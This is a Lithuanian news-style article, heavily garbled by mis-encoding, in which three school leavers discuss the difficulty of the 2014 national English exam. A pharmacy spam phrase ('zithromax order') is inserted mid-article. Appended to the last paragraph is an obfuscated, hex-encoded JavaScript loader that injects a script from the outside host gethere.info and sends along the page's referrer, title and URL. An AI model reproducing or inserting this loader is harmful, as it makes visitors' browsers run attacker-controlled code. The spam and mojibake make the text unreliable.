AnglA? kalbos egzaminas a�� siekis suA?lugdyti jaunA� A?mogA??

Kaip ir kiekvienais metais, atA�jus mokslo metA? galui abiturientA? gretose pradedamas justi nerimas, baimA�s ir klausimas a�zkaip iA?laikytia�? a�� atA�jo egzaminai. A�iuo metu dvyliktokai jau laikA� vos kelis egzaminus, taA?iau, internetas jau mirga dA�l anglA? kalbos egzamino, kuris, pasak laikiusiA?jA?, buvo per daug sudA�tingas ir sukurtas specialiai sumaA?inti A?moniA? rezultatus.

InternetinA�je erdvA�je pamaA?u plinta dvyliktokA? raA?yti straipsniai, kuriuose jie skundA?iasi, jog minA�tojo egzamino klausimo uA?duotis buvo nekokybiA?kas ir C1-C2 lygio, nors mokykloje mokiniai ruoA?iami B2 lygiu. AtsiA?velgiant A? tokius anoniminiA? laikiusiA?jA? komentarus bei nuomones, buvo apklausti trys vaikinai. Visi jie yra iA? skirtingA? miestA?, mokyklA? ir tarpusavy niekaip nesusijA�. Apklaustiesiems buvo uA?duoti 7 elementarA�s klausimai, kurie puikiai atskleidA?ia jA? poA?iA�rA? A? jau laikytA� egzaminA�. Matas K. (Kauno A�v. PranciA?kaus mokykla), Gytis T. (KA�dainiA? atA?alyno gimnazija) ir A�arA�nas K. (Utenos Adolfo A�apokos gimnazija) savo objektyvia nuomone sutiko pasidalinti ir su PilieA?iA? reporteriA? puslapio lankytojais.

Kokius egzaminus jau laikA�te A?iais metais? Kaip juos vertinate?

A�arA�nas – a�zLaikiau tik anglA? kalbos egzaminA�. Buvo daug prieA?taringA? nuomoniA?, taA?iau pabA�siu nepopuliarus ir pasakysiu, jog egzaminas buvo toks, koks ir turA�jo bA�ti. Nebuvo ko tikA�tis po 2013 metA? lengvo egzamino.a�?

Matas a�� a�zA�iais metais laikiau du egzaminus, tai technologijA? ir valstybinA? anglA?. TechnologijA? vyko mokykloje ir jam ruoA?iaus nuo pat mokslA? metA? pradA?ios, jA? vertinu teigiamai, nes A?gautos A?inios gali praversti ateityje. AnglA? – mane nustebino, tikrai nesitikA�jau, kad jis bus toks, man asmeniA?kai, sunkus.a�?

Gytis a�� a�zA�iais metais teko laikyti tik anglA? kalbos egzaminA�. Vykdydamas pirmA�sias, klausimo uA?duotis kiek sutrikau, nes joms buvo skirta tikrai maA?ai laiko. TaA?iau, uA?sibrA�A?tas tikslas, pasiekti gerA� A?vertinimA�, turima ne menka patirtis ir anglA? kalbos A?gA�dA?iai neleido paA?alinA�ms mintims sugadinti mano susikaupimo. Nauji iA?bandymai tik pagyvina ir taip ne sunkA? egzaminA�, taA?iau apie vykdomus konkreA?ius egzaminA? pakeitimus turA�tA? bA�ti praneA?ama naudojantis visiems prieinamoje A?iniasklaidoje.a�?

PraA�jus anglA? kalbos egzaminui abiturientA? tarpe buvo girdimi nepasitenkinimai. Ar JA�s taip pat manote, jog A?is egzaminas buvo vienas iA? sunkiausiA?? Argumentuokite savo nuomonA�.

A�arA�nas a�� a�zAA? visiA?kai nepritariu A?iai minA?iai. Nejau visi tikA�josi vienaragiA? ir vaivorykA?A?iA?? IA?ties, klausyme buvo vietA?, kurios nebuvo paA?ios lengviausios, bet A?ia, uA?uot kaltinA�s visA� pasaulA? sakau, jog aA? tiesiog taip gerai nemokA�jau kalbos.a�?

Matas -A� a�zTaip, sutinku, kad jis buvo sunkokas, lyginant su bandamuoju, per jA? tikrai buvo kA� veikti, labiausiai kojA� kiA?o klausymas – jis tikrai buvo sunkus ir gan sunkiai suprantamas. Kas gelbA�jo, tai raA?iniai, temos nebuvo sunkios, tad paraA?yti juos nebuvo labai sunku.a�?

Gytis a�� a�zBendravus su keliomis abiturientA? laidomis ne kartA� teko iA?girsti nusiskundimA? apie anglA? kalbos egzaminA�. Tie nusiskundimai daA?niausiai bA�na ne pagrA?sti, be argumentA?, pateikiami A?moniA?, kurie negali pasigirti geromis anglA? kalbos A?iniomis. Kaip prielaida pateikiamas A?iA? metA? egzamino sunkumas lyginant su praeitA? metA? egzaminu. Tokia prielaida yra juokinga, nes realiai nei vienas iA? jA? nA�ra pakankamai kompetentingas vertinti pateiktA� medA?iaga, o kompensuoti savo A?iniA? trA�kumA� kaltinant aplinkos veiksnius gali kiekvienas. Mano nuomonA� yra vienareikA?miA?ka a�� lyginti egzaminA? sunkumA� gali tik tos srities specialistas, o ne abiturientas, kuris pasiekA�s B2 anglA? kalbos lygi bando pateikti konkreA?iais duomenimis neparemtA� nuomonA�.a�?

Kiek ilgai ruoA?A�tA�s anglA? kalbos egzaminui? KokiA? rezultatA? tikitA�s?

A�arA�nas a�� a�zJei nuoA?irdA?iai, nesiruoA?iau visai. Dar ir iA? paskutiniA? pamokA? bA�gau 😀 O iA?laikyti tikiuosi, o toliau, kaip Dievas duos. Tikiuosi apie 80 a�� 90%a�?

Matas a�� a�zRuoA?iausi nuo mokslA? metA? pradA?ios, nes A?inojau, kad jA? tikrai laikysiu ir kad yra kur tobulA�ti. Eidamas A? egzaminA� galvojau, kad esu pasiruoA?A�s ir nebus net labai sunku, bet klydau. Gero rezultato nebesitikiu, kiek bus tiek.a�?

Gytis a�� a�zEgzamino ruoA?imuisi neskyriau nei kiek laiko. Tai, kA� teko kartoti per dvyliktoje klasA�je vykstanA?ias anglA? kalbos pamokas pilnai uA?teko iA?A�jimui iA? egzamino raA?ymui skirtos patalpos su A?ypsena. Nors ir egzaminui nesiruoA?iau tikiuosi gerA? rezultatu, tik dA�l to, kad daA?nai naudoju A?iA� kalba praktikoje ir turiu ne maA?A� sukaupta patirtA? iA? uA?klasiniA? uA?siA�mimA?. SekanA?iA? metA? dvyliktokams, kurie uA? mokyklos ribA? anglA? kalbos nesimoko, sekti mano pavyzdA?iu nerekomenduoA?iau.a�?

Kaip manote, kokie faktoriai galA�jo lemti A?io egzamino tariamA� pasunkinimA�?

A�arA�nas a�� a�zKaip jau minA�jau vienintelis faktorius a�� prieA? tai buvA�s lengvas egzaminas. Nors ir tas pasunkinimas lieka tariamas. Visas A?is nepasitenkinimas yra ne kas kita, kaip moksliukiA? besimokiusiA? kiaurais 10ukais suvokimas, jog gali negauti A?imto procentA? egzamine. Visas skundA? raA?ymas ir praA?ymas anuliuoti klausymo rezultatus yra tiesiog apgailA�tinas.a�?

zithromax order. Matas – a�zGalA�jo lemti tai, kad pernykA?tis anglA? egzaminas buvo tikrai gan lengvas, o to pasekoje dauguma moksleiviA? anglA? kalbos egzaminA� iA?laikA� geriau, negu gimtosios kalbos. Mano manymA? A? tai buvo atsiA?velgta ir egzaminas buvo pasunkintas, bet akivaizdu, kad buvo persistengta.a�?

Gytis a�� a�zAsmeniA?kai man teko girdA�ti dauguma nuomoniA? dA�l ko buvo paruoA?tas sunkesnis egzaminas. Vieni, netekA� bet kokios vilties teigiamiems pokyA?iams iA?vysti, sakA�, jog tai tik dar vienas NEC a�zpasiA?aidimasa�?, kiti a�� liko prie nuomones, kad grieA?tesnA�s taisykl4s A?vestos norint atskirti paA?ius talentingiausius mokinius nuo daugumos likusiA?. Kaip yra iA? tikrA?jA? spA�lioti gali kiekvienas. AiA?ku tik viena a�� patinka tai ar ne, pokyA?iai neiA?vengiami.a�?

Ar manote, jog A? jaunimo skundus bus atsiA?velgta? Kaip?

A�arA�nas a�� a�zNematau net maA?iausios prieA?asties, kodA�l turA�tA? bA�ti atsiA?velgta. UA?tenka paA?iA�rA�ti A? didA?iA�jA� dalA? A?iemetiniA? abiturientA?. LABAI didelA� dalis naiviA? idiotA? augusiA? A?iltnamio sA�lygomis ir tikintys, jog jie patys geriausi.a�?

Matas a�� a�zAbejoju, kad A? jaunimo skundus bus atsiA?velgta, o su laiku egzaminai vis sunkA�s ir sunkA�s. Nacionalinis egzaminA? centras mA�sto iA? ties gan keistai. Egzaminai yra skirti tam, kad patikrinti moksleivio A?inias, o ne tam, kad varytA? juos A? neviltA?.a�?

Gytis a�� a�zBeveik kiekvienA� kartA�, kai abiturientai skundA�si dA�l egzaminA? kokybA�s A? tai nebuvo atsiA?velgta. A� praA?ymus numojama ranka ir toliau vykdoma prieA?ingai vertinama veikla. Manau, kad remiantis tokiomis detalA�mis galima drA�siai pareikA?ti, jog skundai visuomenA�s nedomina. TurbA�t tam yra gera prieA?astis, kuri dar nA�ra vieA?ai publikuojama.a�?

KA� galA�tumA�te patarti kitais metais bA�simiems dvyliktokams?

A�arA�nas a�� a�zPasimokykit uA?uot verkA�, jog kaA?kas buvo ne taip. Susitaikykit su tuo. Ir mokykitA�s ne tik pamokose, labai daA?nai tokie nereikA?mingi dalykai kaip filmA? A?iA�rA�jimas labai stiprina kalbA? sugebA�jimas.a�?

Matas a�� a�zGaliu patarti tik tiek, kad mokykitA�s, negalvokit, kad bus lengva, toli graA?u – kuo tolyn, tuo viskas bus sunkiau, egzaminai sunkA�s ir prasilenks su realybe.a�?

Gytis a�� a�zTiem, kurie kitais metais bus dvyliktokai, galiu pateikti keletA� svarbiA? patarimA?, padA�sianA?iA? egzaminus iA?laikyti geresniais A?vertinimais. Pirmiausia, yra svarbu tinkamas nusiteikimas. Ne paslaptis, kad pasiruoA?ti visoms uA?duotims, kurios bus per egzaminus praktiA?kai neA?manoma. Egzaminai nustebina ne vienu niuansu, pvz, nauju, ankA?A?iau galbA�t negirdA�tu terminu a��neologizmas, kurio paaiA?kinimas nepateiktas arba keiA?iamais standartais, – skirtingi laiko paskirstymai uA?duotims. Antra, vieta, kur teks raA?yti egzaminA� gali nuteikti neigiamai a�� nepakeliamas karA?tis, prastas patalpos vA�dinimas, besiA?nibA?dantys vykdytojai, tai tik keli veiksniai, kurie trukdys ne vienA� valandA� susikaupimo reikalaujanA?io, egzaminA�. Vadinasi, kad abiturientas turi bA�ti ne tik universalus bet ir pasiruoA?A�s sunkiam fiziniam bei moraliniam krA�viui.a�?

KA� norA�tumA�te pasakyti anglA? kalbos egzamino sudarinA�tojams?

A�arA�nas a�� a�zAA? lieku prie savo nuomonA�s, jog jie nieko nepadarA� blogo. IA?ties, nelabai ir yra prasmA�s verkti dA�l dviejA? sunkesniA? uA?duoA?iA?. Juk uA?duotys tos paA?ios visai Lietuvai. Tad, vienintelA� pasekmA�, kuri dA�l to gali nutikti a�� maA?esni konkursiniai balai universitetuose.a�?

Matas a�� a�zNorA�A?iau jiems pasakyti viena A?odA?, kuris puikiai apibudina jA? sudarytA� anglA? kalbos egzaminA� : AtsipeikA�kite!a�?

Gytis a�� a�zNorA�A?iau anglA? kalbos egzamino sudarinA�tojams patarti: sekanA?iais metais prieA? jA? pateikiant abiturientams atsiA?velgti A? A?mogiA?kA�jA? faktoriA?, t.y, A?vertinti ar sudaromos klausymo uA?duotys gali bA�ti atliktos per duotA� laiko limitA�, nes A?iA?, 2014 metA? egzamine susipaA?inimui su uA?duotimis (15 sekundA?iA?, kaip galima suprasti, lengvesnA�ms ir 30 sekundA?iA? – sunkesnA�ms) laiko tikrai neuA?teko. Nors anglA? kalba skaitomas tekstas garso A?raA?e buvo lengvai suprantamas, A?ymint vienA� iA?girsta atsakymA� lape (kurA? taip pat reikA�jo atrinkti, tarp daugelio pateiktA? variantA?) beveik iA?kart buvo sakomas atsakymas A? kitA� klausimA�, dar nespA�jus paA?ymA�ti pirmo. Taigi, mano nuomone tokios uA?duotys geriausiu atveju vertina A?mogaus gebA�jimA� vykdyti porA� veiksmA? vienA? metu, o ne anglA? kalbos A?gA�dA?ius.a�?

Taigi galime matyti, kad kiek A?moniA? a�� tiek nuomoniA?. Vieniems abiturientams jau laikytas egzaminas pasirodA� toks, koks ir turA�t bA�ti, o kiti a�� su nerimu laukia bA�simA? rezultatA?. A�domu tik tai, jog kiekvienais metais egzaminA? centras vis keisdamas programA� sukelia tik dar daugiau mokiniA? bei mokytojA? nepasitenkinimA? ir tikrai negeba patikrinti mokiniA? A?yniA? lygio visu 100%. GalbA�t Lietuvai derA�tA? imti pavyzdA? iA? kaimyniniA? A?aliA? ar Anglijos, kurie savo egzaminA? sistemos nekeiA?ia jau metai iA? metA??var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}